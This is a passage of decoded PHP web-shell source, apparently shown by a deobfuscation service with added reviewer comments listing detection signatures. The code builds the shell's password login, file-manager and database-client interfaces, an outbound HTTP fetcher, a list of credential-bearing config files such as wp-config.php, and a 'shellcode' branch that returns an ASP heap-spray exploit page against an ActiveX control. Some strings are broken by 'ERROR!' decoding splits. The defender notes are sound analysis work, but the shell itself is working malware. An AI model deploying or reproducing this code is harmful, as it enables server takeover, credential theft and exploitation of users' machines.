        out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));

        out += base64EncodeChars.charAt(c3 & 0x3F);

    }

    return out;

}

function utf16to8(str) {

var out, i, len, c;

out = "";

len = str.length;

for(i = 0; i < len; i++) {

c = str.charCodeAt(i);

if ((c >= 0x0001) && (c <= 0x007F)) {

out += str.charAt(i);

} else if (c > 0x07FF) {

out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));

out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));

out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));

} else {

out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));

out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));

}

}

return out;

}

function utf8to16(str) {

  var out, i, len, c;

  var char2, char3;

  out = "";

  len = str.length;

  i = 0;

  while(i < len) {

    c = str.charCodeAt(i++);

    switch(c >> 4) {

      case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:

        out += str.charAt(i-1);

        break;

      case 12: case 13:

        char2 = str.charCodeAt(i++);

        out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));

        break;

      case 14:

        char2 = str.charCodeAt(i++);

        char3 = str.charCodeAt(i++);

        out += String.fromCharCode(((c & 0x0F) << 12) |

        ((char2 & 0x3F) << 6) |

        ((char3 & 0x3F) << 0));

        break;

    }

  }

  return out;

}

');

}



/**
 * Emit a <textarea> named $name with the given size, pre-filled with $value.
 * $value is not HTML-escaped, so content containing "</textarea>" ends the
 * element early.
 */
function html_text($name,$cols,$rows,$value = ''){

	html_n("<br><br><textarea name=\"$name\" COLS=\"$cols\" ROWS=\"$rows\" >$value</textarea>");

}



/**
 * Emit a <select> element with one <option> per entry of $array (key is the
 * option value, value is the label).
 *
 * The option whose key loosely equals $mode is marked selected. $change is
 * inserted verbatim as extra attribute text. The foreach reuses $name as its
 * key variable, shadowing the parameter once the opening tag is written.
 * Nothing is HTML-escaped, and the select's name attribute is unquoted.
 */
function html_select($array,$mode = '',$change = '',$name = 'class'){

	html_n("<select name=$name $change>");

	foreach($array as $name => $value){

		// Loose comparison: numeric-looking keys and strings may compare equal.
		if($name == $mode){

			html_n("<option value=\"$name\" selected>$value</option>");

		}else{

			html_n("<option value=\"$name\">$value</option>");

		}

	}

	html_n("</select>");

}



/**
 * Emit $name wrapped in a <font> element with the given colour and size.
 * No argument is HTML-escaped.
 */
function html_font($color,$size,$name){

	html_n("<font color=\"$color\" size=\"$size\">$name</font>");

}



/**
 * Fetch $url from the server side and return the response body.
 *
 * Three transports are tried in order until one yields a non-empty result:
 * a hand-written HTTP/1.0 request over fsockopen(), then cURL, then
 * file_get_contents(). If all fail, a JavaScript document.write() snippet
 * embedding $url (unescaped) is echoed and nothing is returned.
 *
 * Security review notes:
 *  - This gives the shell an outbound HTTP client running as the web-server
 *    account. Callers are outside this excerpt, so what it fetches is
 *    unconfirmed.
 *  - Network indicator: both the socket and cURL paths send the User-Agent
 *    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)". Outbound requests
 *    from a web server with that value are worth alerting on.
 *  - The socket path always speaks plain HTTP and defaults to port 80.
 *
 * @param string $url URL to retrieve.
 * @return string|null|false Body on success; null when every transport
 *                           failed or returned an empty result.
 */
function GetHtml($url)

{

      $c = '';

      $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';

      if(function_exists('fsockopen')){

    	$link = parse_url($url);

	    // 'path', 'query' and 'port' are read without checking that parse_url() returned them.
	    $query=$link['path'].'?'.$link['query'];

	    $host=strtolower($link['host']);

	    $port=$link['port'];

	    if($port==""){$port=80;}

	    $fp = fsockopen ($host,$port, $errno, $errstr, 10);

	    if ($fp)

	      {

		    // $query already starts with the URL path, so the request line gets a doubled leading slash.
		    $out = "GET /{$query} HTTP/1.0\r\n"; 

		    $out .= "Host: {$host}\r\n"; 

		    $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n"; 

		    $out .= "Connection: Close\r\n\r\n"; 

		    fwrite($fp, $out);

		    // Skip header lines up to the first blank line, then accumulate the body.
		    // $contents is never initialised before the first append.
		    $inheader=1;

		    while(!feof($fp)) 

		         {$line=fgets($fp,4096);	

			      if($inheader==0){$contents.=$line;}

			      if ($inheader &&($line=="\n"||$line=="\r\n")){$inheader = 0;}

		    } 

		    fclose ($fp); 

		    $c= $contents;

	      }

        }

		// Fallback 1: cURL, with a 15 second timeout.
		if(empty($c) && function_exists('curl_init') && function_exists('curl_exec')){

            $ch = curl_init();

            curl_setopt($ch, CURLOPT_URL, $url);

            curl_setopt($ch, CURLOPT_TIMEOUT, 15);

            curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);

            curl_setopt($ch, CURLOPT_USERAGENT, $useragent);

            $c = curl_exec($ch);

            curl_close($ch);

        }

        // Fallback 2: URL wrappers, if allow_url_fopen is enabled.
        if(empty($c) && ini_get('allow_url_fopen')){

            $c = file_get_contents($url);

        }

		if(empty($c)){

            echo "document.write('<DIV style=\'CURSOR:url(\"$url\")\'>');";

        }

		if(!empty($c))

		{

        return $c;

		}

 }



/**
 * Print the shell's outer frame page.
 *
 * The page has a title taken from $shellname, a header row showing the IP
 * that gethostbyname() returns for $_SERVER['SERVER_NAME'], and a GET form
 * with a `path` field that targets the `main` frame. Two iframes follow,
 * loading `?eanver=left` and `?eanver=main` from this same script.
 *
 * $path and $shellname are interpolated without HTML escaping.
 *
 * Defender note: requests to one PHP file with `eanver=left`, `eanver=main`
 * and a `path=` parameter holding a filesystem path are a usable
 * access-log signature for this sample.
 */
function html_main($path,$shellname){

$serverip=gethostbyname($_SERVER['SERVER_NAME']);

print<<<END

<html><title>{$shellname}</title>

<table width='100%'><tr><td width='150' align='center'>{$serverip}</td><td><form method='GET' target='main'><input type='hidden' name='eanver' value='main'><input name='path' style='width:100%' value='{$path}'></td><td width='140' align='center'><input name='Submit' type='submit' value=''> <input type='submit' value='' onclick='main.location.reload()'></td></tr></form></table>

END;

	html_n("<table width='100%' height='95.7%' border=0 cellpadding='0' cellspacing='0'><tr><td width='170'><iframe name='left' src='?eanver=left' width='100%' height='100%' frameborder='0'>");

	html_n("</iframe></td><td><iframe name='main' src='?eanver=main' width='100%' height='100%' frameborder='1'>");

	html_n("</iframe></td></tr></table></html>");

}



/**
 * Print the shell's login page: a stylesheet, a link to $myurl labelled
 * $shellname, and a POST form with a single password field named `postpass`.
 *
 * The top-level code calls this when the `postpass` cookie does not equal
 * md5() of the configured password. On a correct POST it stores that MD5 as
 * the cookie value.
 *
 * Security review notes:
 *  - The session token is an unsalted MD5 of the password itself, so anyone
 *    who captures the cookie holds a permanent credential.
 *  - Detection: a POST body field or cookie named `postpass` sent to a PHP
 *    file is a usable indicator for this sample.
 *  - $shellname and $myurl are interpolated without HTML escaping.
 */
function islogin($shellname,$myurl){

print<<<END

<style type="text/css">body,td{font-size: 12px;color:#00ff00;background-color:#000000;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}.C{background-color:#000000;border:0px}.cmd{background-color:#000;color:#FFF}body{margin: 0px;margin-left:4px;}BODY {SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}.am{color:#888;font-size:11px;}</style>

<body style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" scroll=no><center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href='{$myurl}' target='_blank'>{$shellname}</a><br><br><form method='post'><input name='postpass' type='password' size='22'> <input type='submit' value=''><br><br><br><font color=#3399FF></font><br></div></center>

END;

}



/**
 * Emit the input fields of the shell's MySQL connection form and close the
 * form. The fields are sqlhost, sqlport, sqluser, sqlpass, sqldb and a
 * submit button named sqllogin.
 *
 * The opening <form> tag is written elsewhere. The defaults are "localhost",
 * "3306", "root" and "dbname".
 *
 * Defender note: these field names in a POST body to a PHP file indicate the
 * shell's database client is in use. The handler is outside this excerpt.
 */
function html_sql(){

	html_input("text","sqlhost","localhost","<br>MYSQL","30");

	html_input("text","sqlport","3306","<br>MYSQL","30");

	html_input("text","sqluser","root","<br>MYSQL","30");

	html_input("password","sqlpass","","<br>MYSQL","30");

	html_input("text","sqldb","dbname","<br>MYSQL","30");

	html_input("submit","sqllogin","","<br>");

	html_n('</form>');

}



/**
 * Shorten $data for display: strings of fewer than $len bytes are returned
 * unchanged; anything else is cut at byte offset $len and suffixed with "...".
 *
 * A string of exactly $len bytes therefore also gets the suffix. Lengths are
 * byte counts, so a multi-byte character can be split.
 */
function Mysql_Len($data,$len)

{

	if(strlen($data) < $len) return $data;

	return substr_replace($data,'...',$len);

}



/**
 * Echo $data followed by a newline.
 *
 * Every html_* and css_* helper in this file writes through here. No
 * escaping is applied at this layer or by those helpers.
 */
function html_n($data){

	echo "$data\n";

}



/*---css---*/



/**
 * Serve one of the shell's embedded file-type icons and terminate.
 *
 * $images maps an icon key (exe, dir, txt, html, js, xml, mp3, img, title,
 * rar) to a base64 string. The entry for $img is decoded and sent with
 * Content-type image/gif. An unknown key reads an undefined index and sends
 * an empty body.
 *
 * The top-level dispatcher passes $_GET['img'] here, and html_img() emits the
 * matching `?img=` URLs.
 *
 * Defender note: embedding the icons keeps the shell to a single file with
 * no external assets. Requests for a PHP script with only an `img=<key>`
 * parameter that return image/gif are a usable access-log signature.
 *
 * @param string $img Icon key taken from the request.
 */
function css_img($img){

	$images = array(

	"exe"=>

	"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".

	"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".

	"xhIAOw==",

	"dir"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA".

	"AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE".

	"oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",

	"txt"=>

	"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".

	"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".

	"UpPWG3Ig6Hq/XmRjuZwkAAA7",

	"html"=>

	"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".

	"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".

	"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".

	"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".

	"ADs=",

	"js"=>

	"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".

	"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".

	"a00AjYYBbc/o9HjNniUAADs=",

	"xml"=>

	"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".

	"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

	"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".

	"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".

	"IQA7",

	"mp3"=>

	"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".

	"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".

	"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",

	"img"=>

	"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".

	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".

	"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".

	"FxEAOw==",

	"title"=>"R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+".

	"mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

	"ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL".

	"I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",

	"rar"=>"R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA".

    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/".

    "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b".

    "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC".

    "aNOmRcjVj02tPxPCzfkvIAA7"

	);

  header('Content-type: image/gif');

  echo base64_decode($images[$img]);

  die();

}



/**
 * Pick the icon key for a file name from its last three characters.
 *
 * The comparison is case-sensitive and looks only at the final three bytes,
 * which is why "tml" stands in for ".html", ".js" for JavaScript and ".gz"
 * for gzip. Anything unrecognised maps to 'txt'. The returned key is one of
 * the entries served by css_img().
 *
 * @param string $file File name or path.
 * @return string One of 'img', 'html', 'exe', 'xml', 'js', 'mp3', 'rar', 'txt'.
 */
function css_showimg($file){

	$it=substr($file,-3);

	switch($it){

		case "jpg": case "gif": case "bmp": case "png": case "ico": return 'img';break;

		case "htm": case "tml": return 'html';break;

		case "exe": case "com": return 'exe';break;

		case "xml": case "doc": return 'xml';break;

		case ".js": case "vbs": return 'js';break;

		case "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi":case "mp4":case "mvb": return 'mp3';break;

		case "rar": case "tar": case ".gz": case "zip":case "iso": return 'rar';break;

  	default: return 'txt';break;

	}

}



/**
 * Emit, or for "shellcode" return, a block of client-side script selected
 * by $num.
 *
 *  - "shellcode": returns (does not echo) the text of a server-side JScript
 *    (ASP) page. It instantiates the ActiveX object named in the string and
 *    calls one of its methods with a long generated buffer, with $code
 *    embedded via unescape(). This branch is an exploit-page generator, not
 *    UI code. Any file on disk matching this template should be treated as
 *    malicious.
 *  - "1": file-manager dialog helpers (rusurechk, rusuredel, Delok, CheckAll,
 *    CheckDate, SubmitUrl). They fill the hidden fields `actall` and `inver`
 *    and submit the form with id `fileall`.
 *  - "2": an in-page text search plus CheckDate(), which validates the
 *    `mtime` field and base64-encodes `newfile` and `txt` before submitting
 *    the form with id `editor`.
 *  - "3": Full(i), which pre-fills database connection strings and SQL
 *    statement templates into DbForm.
 *  - "4": Fulll(i), which pre-fills the names of common application
 *    configuration files (for example wp-config.php) into sform.code. These
 *    are the files that typically hold database credentials.
 *
 * For every value except "shellcode", the output is wrapped in a <script>
 * element.
 *
 * Defender notes:
 *  - The element ids above (fileall, actall, inver, editor, newfile, mtime)
 *    are stable strings in the served pages and work as content signatures.
 *  - NOTE(review): the "escapERROR!" / "e(re)" split inside the "1" branch
 *    looks like a decoding-tool artifact (probably `escape(re)` in the raw
 *    sample); confirm against the original file.
 *
 * @param string $num  Selector: "shellcode", "1", "2", "3" or "4".
 * @param string $code Used only by the "shellcode" branch.
 */
function css_js($num,$code = ''){

	if($num == "shellcode"){

		// Returned to the caller as a string; nothing is written to the response here.
		return '<%@ LANGUAGE="JavaScript" %>

		<%

		var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");

		var shellcode = unescape("'.$code.'");

		var bigblock = unescape("%u9090%u9090");

		var headersize = 20;

		var slackspace = headersize+shellcode.length;

		while (bigblock.length<slackspace) bigblock+=bigblock;

		fillblock = bigblock.substring(0, slackspace);

		block = bigblock.substring(0, bigblock.length-slackspace);

		while(block.length+slackspace<0x40000) block = block+block+fillblock;

		memory = new Array();

		for (x=0; x<300; x++) memory[x] = block + shellcode;

		var buffer = "";

		while (buffer.length < 1319) buffer+="A";

		buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer;

		act.hgs_startNotify(buffer);

		%>';

	}

	html_n('<script language="javascript">');

	if($num == "1"){

	html_n('	function rusurechk(msg,url){

		smsg = "FileName:[" + msg + "]\nPlease Input New File:";

		re = prompt(smsg,msg);

		if (re){

			url = url + re;

			window.location = url;

		}

	}

	function rusuredel(msg,url){

		smsg = "Do You Suer Delete [" + msg + "] ?";

		if(confirm(smsg)){

			URL = url + msg;

			window.location = url;

		} 

	}

	function Delok(msg,gourl)

	{

		smsg = "[" + unescape(msg) + "]?";

		if(confirm(smsg))

		{

			if(gourl == \'b\')

			{

				document.getElementById(\'actall\').value = escape(gourl);

				document.getElementById(\'fileall\').submit();

			}

			else window.location = gourl;

		}

	}

	function CheckAll(form)

	{

		for(var i=0;i<form.elements.length;i++)

		{

			var e = form.elements[i];

			if (e.name != \'chkall\')

			e.checked = form.chkall.checked;

		}

	}

	function CheckDate(msg,gourl)

	{

		smsg = ":[" + msg + "]";

		re = prompt(smsg,msg);

		if(re)

		{

			var url = gourl + re;

			var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 

			var r = re.match(reg);

			if(r==null){alert(\'!:yyyy-mm-dd hh:mm:ss\');return false;}

			else{document.getElementById(\'actall\').value = gourl; document.getElementById(\'inver\').value = re; document.getElementById(\'fileall\').submit();}

		}

	}

	function SubmitUrl(msg,txt,actid)

	{

		re = prompt(msg,unescape(txt));

		if(re)

		{

			document.getElementById(\'actall\').value = actid;

			document.getElementById(\'inver\').value = escapERROR!
e(re);

			document.getElementById(\'fileall\').submit();

		}

	}');

	}elseif($num == "2"){

	html_n('var NS4 = (document.layers);

var IE4 = (document.all);

var win = this;

var n = 0;

function search(str){

	var txt, i, found;

	if(str == "")return false;

	if(NS4){

		if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;

		if(n == 0) alert(str + " ... Not-Find")

	}

	if(IE4){

		txt = win.document.body.createTextRange();

		for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){

			txt.moveStart("character", 1);

			txt.moveEnd("textedit")

		}

		if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}

		else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}

	}

	return false

}

function CheckDate(){

	var re = document.getElementById(\'mtime\').value;

	var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 

	var r = re.match(reg);

	var t = document.getElementById(\'charset\').value;

    t = t.toLowerCase();

	if(r==null){alert(\'!:yyyy-mm-dd hh:mm:ss\');return false;}

	else{document.getElementById(\'newfile\').value = base64encode(document.getElementById(\'newfile\').value);

	if(t=="utf-8"){document.getElementById(\'txt\').value = base64encode(utf16to8(document.getElementById(\'txt\').value));}

');

// Only the first character of PHP_VERSION is compared, so the GBK/GB2312
// line is emitted when that digit is 5 or higher.
if (substr(PHP_VERSION,0,1)>=5){html_n('if(t=="gbk" || t=="gb2312"){document.getElementById(\'txt\').value = base64encode(utf16to8(document.getElementById(\'txt\').value));}');}

html_n('

	document.getElementById(\'editor\').submit();}

}');

}elseif($num == "3"){

	html_n('function Full(i){

   if(i==0 || i==5){

     return false;

   }

  Str = new Array(12);  

	Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb";

	Str[2] = "Driver={Sql Server};Server=,1433;Database=DbName;Uid=sa;Pwd=****";

	Str[3] = "Driver={MySql};Server=;Port=3306;Database=DbName;Uid=root;Pwd=****";

	Str[4] = "Provider=MSDAORA.1;Password=;User ID=;Data Source=;Persist Security Info=True;";

	Str[6] = "SELECT * FROM [TableName] WHERE ID<100";

	Str[7] = "INSERT INTO [TableName](USER,PASS) VALUES(\'eanver\',\'mypass\')";

	Str[8] = "DELETE FROM [TableName] WHERE ID=100";

	Str[9] = "UPDATE [TableName] SET USER=\'eanver\' WHERE ID=100";

	Str[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";

	Str[11] = "DROP TABLE [TableName]";

	Str[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";

	Str[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";

	if(i<=4){

	  DbForm.string.value = Str[i];

  }else{

  	DbForm.sql.value = Str[i];

  }

  return true;

  }');

}

elseif($num == "4"){

	html_n('function Fulll(i){

   if(i==0){

     return false;

   }

  Str = new Array(8);  

	Str[1] = "config.inc.php";

	Str[2] = "config.inc.php";

	Str[3] = "config_base.php";

	Str[4] = "config.inc.php";

	Str[5] = "config.php";

	Str[6] = "wp-config.php";

	Str[7] = "config.php";

	Str[8] = "mysql.php";

	sform.code.value = Str[i];

  return true;

  }');

}

html_n('</script>');

}



/**
 * Emit the stylesheet and script for the shell's left-hand menu frame, then
 * open the `<div class="menu">` container. The closing tag is written
 * elsewhere.
 *
 * The script defines getObject(), an element lookup with legacy
 * document.all / document.layers fallbacks, and showHide(), which toggles an
 * element between display "none" and "block".
 *
 * NOTE(review): the "getElERROR!" / "ementById" split inside the script
 * string looks like a decoding-tool artifact, not part of the sample;
 * confirm against the raw file.
 */
function css_left(){

	html_n('<style type="text/css">

	.menu{width:152px;margin-left:auto;margin-right:auto;}

	.menu dl{margin-top:2px;}

	.menu dl dt{top left repeat-x;}

	.menu dl dt a{height:22px;padding-top:1px;line-height:18px;width:152px;display:block;color:#FFFFFF;font-weight:bold;

	text-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;}

	.menu dl dt a:hover{color:#FFFFCC;}

	.menu dl dd ul{list-style:none;}

	.menu dl dd ul li a{color:#000000;height:27px;widows:152px;display:block;line-height:27px;text-indent:28px;

	background:#BBBBBB no-repeat 13px 11px;border-color:#FFF #545454 #545454 #FFF;

	border-style:solid;border-width:1px;}

	.menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;font-weight:bold;}

	</STYLE>');

	html_n('<script language="javascript">

	function getObject(objectId){

	 if(document.getElERROR!
ementById && document.getElementById(objectId)) {

	 return document.getElementById(objectId);

	 }

	 else if (document.all && document.all(objectId)) {

	 return document.all(objectId);

	 }

	 else if (document.layers && document.layers[objectId]) {

	 return document.layers[objectId];

	 }

	 else {

	 return false;

	 }

	}

	function showHide(objname){

	  var obj = getObject(objname);

	    if(obj.style.display == "none"){

			obj.style.display = "block";

		}else{

			obj.style.display = "none";

		}

	}

	</script><div class="menu">');

}



/**
 * Emit the stylesheet for the shell's main frame, then open the <body> and
 * the outer layout <table>. css_foot() writes the closing table tags.
 *
 * The top-level `unzip` handler calls this before start_unzip().
 *
 * Defender note: the inline style block and the DXImageTransform gradient
 * filter with startColorStr=#626262 / endColorStr=#1C1C1C are fixed strings
 * in every page the shell serves, which makes them usable response-body
 * signatures.
 */
function css_main(){

	html_n('<style type="text/css">

	*{padding:0px;margin:0px;}

	body,td{font-size: 12px;color:#00ff00;background:#292929;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}

	body{color:#FFFFFF;font-family:Verdana, Arial, Helvetica, sans-serif;

	height:100%;overflow-y:auto;background:#333333;SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}

	input,select,textarea{background-color:#FFFFCC;border:1px solid #FFFFFF}

    a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}

	.actall{background:#000000;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}

	</STYLE><body style="table-layout:fixed; word-break:break-all; FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">

	<table width="85%" border=0 bgcolor="#555555" align="center">');

}



/**
 * Emit the closing </td></tr></table> for the layout table that css_main()
 * opens.
 */
function css_foot(){

	html_n('</td></tr></table>');

}



function Mysql_shellcode()

{

	return "0x

Function Calls

None

Variables

None

Stats

MD5 8e3348f2abf5379e4088b932bf049d75
Eval Count 0
Decode Time 534 ms